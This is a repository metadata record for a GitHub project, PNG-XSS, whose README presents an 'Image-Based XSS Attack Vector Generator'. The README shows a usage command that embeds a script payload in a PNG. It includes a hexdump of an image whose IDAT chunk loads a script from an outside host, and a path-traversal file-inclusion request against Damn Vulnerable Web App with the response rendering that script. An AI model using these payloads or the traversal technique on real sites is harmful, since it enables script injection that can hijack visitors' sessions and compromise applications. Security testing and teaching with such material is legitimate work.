{"id":25360134,"url":"https://github.com/lamcodeofpwnosec/png-xss","last_synced_at":"2025-04-09T02:46:41.264Z","repository":{"id":275622967,"uuid":"926668680","full_name":"lamcodeofpwnosec/PNG-XSS","owner":"lamcodeofpwnosec","description":"Image-Based XSS Attack Vector Generator","archived":false,"fork":false,"pushed_at":"2025-02-03T17:34:44.000Z","size":74,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-04-06T02:15:49.513Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lamcodeofpwnosec.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-02-03T16:58:08.000Z","updated_at":"2025-02-03T17:34:47.000Z","dependencies_parsed_at":"2025-02-03T17:57:19.558Z","dependency_job_id":null,"html_url":"https://github.com/lamcodeofpwnosec/PNG-XSS","commit_stats":null,"previous_names":["lamcodeofpwnosec/png-xss"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lamcodeofpwnosec%2FPNG-XSS","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lamcodeofpwnosec%2FPNG-XSS/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lamcodeofpwnosec%2FPNG-XSS/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lamcodeofpwnosec%2FPNG-XSS/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lamcodeofpwnosec","download_url":"https://codeload.github.com/lamcodeofpwnosec/PNG-XSS/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247968244,"owners_count":21025797,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2025-02-14T21:28:16.935Z","updated_at":"2025-04-09T02:46:41.245Z","avatar_url":"https://github.com/lamcodeofpwnosec.png","language":"Python","funding_links":[],"categories":[],"sub_categories":[],"readme":"# PNG-XSS\nImage-Based XSS Attack Vector Generator\n\n### Usage\n```\n~/$ python3 exploit.py -p \"\u003cscript\u003ealert(1);\u003c/script\u003e\" -o xss_payloads.png\n```\n### Example Payloads Will Generated as\n\n\u003cimg src=\"xss.png\"\u003e\n\n```\n~/$ hexdump -C xss.png \n00000000  89 50 4e 47 0d 0a 1a 0a  00 00 00 0d 49 48 44 52  |.PNG........IHDR|\n00000010  00 00 00 20 00 00 00 20  08 02 00 00 00 fc 18 ed  |... ... ........|\n00000020  a3 00 00 00 79 49 44 41  54 78 9c 63 fc 3c 53 43  |....yIDATx.c.\u003cSC|\n00000030  52 49 50 54 20 53 52 43  3d 2f 2f 58 53 53 2e 56  |RIPT SRC=//XSS.V|\n00000040  41 56 4b 41 4d 49 4c 2e  43 5a 3e 3c 2f 53 43 52  |AVKAMIL.CZ\u003e\u003c/SCR|\n00000050  49 50 54 3e 20 a0 ff ba  e3 fc ab 7f cf dc 0c 7b  |IPT\u003e ..........{|\n00000060  c5 f2 d2 cb 43 f1 c1 fd  db 2a cf df de ff fc ff  |....C....*......|\n00000070  f9 87 1f 56 7f ff f2 04  7a 5c bf 72 f7 ca b3 37  |...V....z\\.r...7|\n00000080  9a 7a 6b 3b fb 18 19 19  46 c1 28 18 05 a3 60 14  |.zk;....F.(...`.|\n00000090  8c 82 51 30 0a 46 c1 28  18 05 43 0e 00 00 1b 22  |..Q0.F.(..C....\"|\n000000a0  26 02 5b 4d 02 76 00 00  00 00 49 45 4e 44 ae 42  |\u0026.[M.v....IEND.B|\n000000b0  60 82                                             |`.|\n000000b2\n````\n\n#### Damn Vulnerable Web App\n`http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/xss.png`\n\n```\nHTTP/1.1 200 OK\nDate: Fri, 23 Aug 2019 00:13:37 GMT\nContent-Type: text/html;charset=utf-8\nContent-Length: 3422\nConnection: close\n\n�PNG\n\u001a\n\nIHDR  \b\u0002�\u0018��yIDATx�c�\u003cSCRIPT SRC=\\\\XSS.VAVKAMIL.CZ\u003e\u003c/SCRIPT\u003e ���\u0019��=s3�\u0015�K�\u000f_s������?��_�X1��\t��~���go4��v�322��Q0\nF�(\u0018\u0005�`\u0014��Q0\n�\u001c4�%\u0002\u0011�۠IEND�B`�\n\u003c!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\"\u003e\n\n\u003chtml xmlns=\"http://www.w3.org/1999/xhtml\"\u003e\n```\n### Stack Overflow\n[PHP shell on PNG's IDAT Chunk](https://stackoverflow.com/questions/49144776/php-shell-on-pngs-idat-chunk)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flamcodeofpwnosec%2Fpng-xss","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Flamcodeofpwnosec%2Fpng-xss","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Flamcodeofpwnosec%2Fpng-xss/lists"}